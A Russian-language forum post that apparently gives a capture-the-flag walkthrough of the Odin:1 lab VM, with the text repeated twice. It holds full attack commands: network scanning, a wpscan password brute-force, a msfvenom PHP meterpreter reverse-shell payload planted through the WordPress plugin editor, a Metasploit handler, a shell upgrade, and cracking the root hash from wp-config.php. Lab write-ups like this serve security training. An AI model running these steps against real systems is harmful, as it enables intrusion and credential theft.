A
AngelXXXanax
Original poster
И так... Посидел, поймал солевой трип и стал солевым гением. Так что сегодня вы будете читать статью о прохождении CTF Odin:1.
Незабываем добавить его в /etc/hosts
Так как он ставиться на VM, VB нам прийдется проскинть нашу сеть, чтобы найти IP. Для этого мы будем использовать утилиту под название arp-scan. Для этого мы пишем:
sudo arp-scan -l
IP машину у меня 192.168.1.6
Давайте теперь просканим открытые порты и посмотрим что там у нас такое интересное. Для этого мы будем использовать утилиту nmap > Ключ: sudo nmap -sS -Pn -n -p- -vvv -T4 192.168.1.6
Как мы можем видеть у нас есть открытый порт 80. Это значит что мы можем перейти по этому IP и попасть на сайт. Если это сделать - то мы увидим это:
Верно! Это говно какое-то) Если немного полазить по сайту мы можем понять что он на движке wordpress. Так что давайте зайдем на точку входа в админ панель.
Окей. На данный момент у нас все весьма хорошо! Так что давайте попробуем сбрутить админ пароль с помощью wpscan.
Для этого мы напишем:
wpscan --url --usernames admin --passwords путь на ваш словарь для брута
Теперь нам осталось недолго подождать когда подберет нужный нам пароль. И как мы видим он смог подобрать нужный нам пароль:
Пробуем зайти в админ-панель:
Как мы видим у нас все получилось! Но нам нужно как-то попасть на сервер и получить флаг... Так что можно попробовать загрузить шелл на сайт! Для этого жмем plugins > plugin editor:
Теперь давайте будем использовать msfvenom, чтобы создать наш шелл. Для этого пишем:
msfvenom -p php/meterpreter/reverse_tcp lhost=ваш IP lport=4444 R
Теперь копируем и кидаем в плагины:
Теперь запускаем наш msfconsole и пишем:
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost ваш IP
set lport 4444
exploit
Теперь загружаем шелл и переходим по пути:
P.S это в моем случае так как я выбрал другой плагин)
И как мы можем видеть мы получили meterpreter сессию. Теперь пишем shell, после чего пишем
python3 -c "import pty;pty.spawn('/bin/bash')"
Как мы можем видеть у нас появился нормальный рабочий шелл. Давайте теперь немного полазим по файлам. Как мы видим я перешел на этот путь и нашел файл wp-config.php
Давайте теперь напишем: cat wp-config.php
После чего мы сразу увидим такой странный ключ:
Он и есть нашим паролем для входа в рут! Но нам ещё нужно взломать его. Для этого просто копируем его и сохраняем "В моем случае файл называться crack.txt". Теперь пишем:
john --wordlist=/usr/share/john/password.lst путь к файлу/crack.txt
Как мы видим пароль нашелся! "jasmine". Теперь давайте попробуем зайти. Просто пишем: su root:
Теперь переходим в директорию root. Пишем cat bjorn:
Вот и все! Мы прошли машину.
Незабываем добавить его в /etc/hosts
Так как он ставиться на VM, VB нам прийдется проскинть нашу сеть, чтобы найти IP. Для этого мы будем использовать утилиту под название arp-scan. Для этого мы пишем:
sudo arp-scan -l
![e491359e1c4a738950ed6.png](/proxy.php?image=https%3A%2F%2Ftelegra.ph%2Ffile%2Fe491359e1c4a738950ed6.png&hash=b5796a8628033220ba76fff349d60daf)
IP машину у меня 192.168.1.6
Давайте теперь просканим открытые порты и посмотрим что там у нас такое интересное. Для этого мы будем использовать утилиту nmap > Ключ: sudo nmap -sS -Pn -n -p- -vvv -T4 192.168.1.6
![c0687665d5d2ef2d5f5f3.png](/proxy.php?image=https%3A%2F%2Ftelegra.ph%2Ffile%2Fc0687665d5d2ef2d5f5f3.png&hash=0a1b667191271f42e4c5e58a11ef1231)
Как мы можем видеть у нас есть открытый порт 80. Это значит что мы можем перейти по этому IP и попасть на сайт. Если это сделать - то мы увидим это:
![e7dcc258f5f2dace2176d.png](/proxy.php?image=https%3A%2F%2Ftelegra.ph%2Ffile%2Fe7dcc258f5f2dace2176d.png&hash=070ee06c9109db0b414cab0638338074)
Верно! Это говно какое-то) Если немного полазить по сайту мы можем понять что он на движке wordpress. Так что давайте зайдем на точку входа в админ панель.
![3ceaa18a30d3b0d2bf52a.png](/proxy.php?image=https%3A%2F%2Ftelegra.ph%2Ffile%2F3ceaa18a30d3b0d2bf52a.png&hash=b1f4a3952d3e573d9ddf828894878edc)
Окей. На данный момент у нас все весьма хорошо! Так что давайте попробуем сбрутить админ пароль с помощью wpscan.
Для этого мы напишем:
wpscan --url --usernames admin --passwords путь на ваш словарь для брута
Теперь нам осталось недолго подождать когда подберет нужный нам пароль. И как мы видим он смог подобрать нужный нам пароль:
![37d3c1c3023d47608eaf8.png](/proxy.php?image=https%3A%2F%2Ftelegra.ph%2Ffile%2F37d3c1c3023d47608eaf8.png&hash=18c9d8322b4c3786bee3f77c039efffd)
Пробуем зайти в админ-панель:
![dee29bd0751a95a5f2997.png](/proxy.php?image=https%3A%2F%2Ftelegra.ph%2Ffile%2Fdee29bd0751a95a5f2997.png&hash=20605a333220743507eb32594b6648f2)
Как мы видим у нас все получилось! Но нам нужно как-то попасть на сервер и получить флаг... Так что можно попробовать загрузить шелл на сайт! Для этого жмем plugins > plugin editor:
![a6b49fd00042f4d702d86.png](/proxy.php?image=https%3A%2F%2Ftelegra.ph%2Ffile%2Fa6b49fd00042f4d702d86.png&hash=38082b91fe1ae56ea0bcc22d419291cc)
Теперь давайте будем использовать msfvenom, чтобы создать наш шелл. Для этого пишем:
msfvenom -p php/meterpreter/reverse_tcp lhost=ваш IP lport=4444 R
![ab764c8c307e6794b72e3.png](/proxy.php?image=https%3A%2F%2Ftelegra.ph%2Ffile%2Fab764c8c307e6794b72e3.png&hash=1f26cad04d2c57837f335ae73c59de77)
Теперь копируем и кидаем в плагины:
![06626259090d8a360d325.png](/proxy.php?image=https%3A%2F%2Ftelegra.ph%2Ffile%2F06626259090d8a360d325.png&hash=e8227afa56d5cf470bda13bb03316b94)
Теперь запускаем наш msfconsole и пишем:
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost ваш IP
set lport 4444
exploit
Теперь загружаем шелл и переходим по пути:
P.S это в моем случае так как я выбрал другой плагин)
И как мы можем видеть мы получили meterpreter сессию. Теперь пишем shell, после чего пишем
python3 -c "import pty;pty.spawn('/bin/bash')"
![88840cb4cad8805c45836.png](/proxy.php?image=https%3A%2F%2Ftelegra.ph%2Ffile%2F88840cb4cad8805c45836.png&hash=81ee36b50027b2e6c961b095a967da39)
Как мы можем видеть у нас появился нормальный рабочий шелл. Давайте теперь немного полазим по файлам. Как мы видим я перешел на этот путь и нашел файл wp-config.php
![12e529a20235515433aa0.png](/proxy.php?image=https%3A%2F%2Ftelegra.ph%2Ffile%2F12e529a20235515433aa0.png&hash=29e3346238e84a996a59f0bf992dc65d)
Давайте теперь напишем: cat wp-config.php
После чего мы сразу увидим такой странный ключ:
![f5b165e072da409ad4f43.png](/proxy.php?image=https%3A%2F%2Ftelegra.ph%2Ffile%2Ff5b165e072da409ad4f43.png&hash=9722c32cf1aac6014b896057108b06fa)
Он и есть нашим паролем для входа в рут! Но нам ещё нужно взломать его. Для этого просто копируем его и сохраняем "В моем случае файл называться crack.txt". Теперь пишем:
john --wordlist=/usr/share/john/password.lst путь к файлу/crack.txt
![5c4bea1c15db2d249fcc1.png](/proxy.php?image=https%3A%2F%2Ftelegra.ph%2Ffile%2F5c4bea1c15db2d249fcc1.png&hash=0c70b4c4a01cd5ef735485e71e7b8cf5)
Как мы видим пароль нашелся! "jasmine". Теперь давайте попробуем зайти. Просто пишем: su root:
![ea3f7a9c4f12cef556e8d.png](/proxy.php?image=https%3A%2F%2Ftelegra.ph%2Ffile%2Fea3f7a9c4f12cef556e8d.png&hash=92aaa5f966e5c91352c3a3d063b50537)
Теперь переходим в директорию root. Пишем cat bjorn:
![339f40cf2d85858047d8e.png](/proxy.php?image=https%3A%2F%2Ftelegra.ph%2Ffile%2F339f40cf2d85858047d8e.png&hash=db37f1ff7567086e5949406b37ce1158)
Вот и все! Мы прошли машину.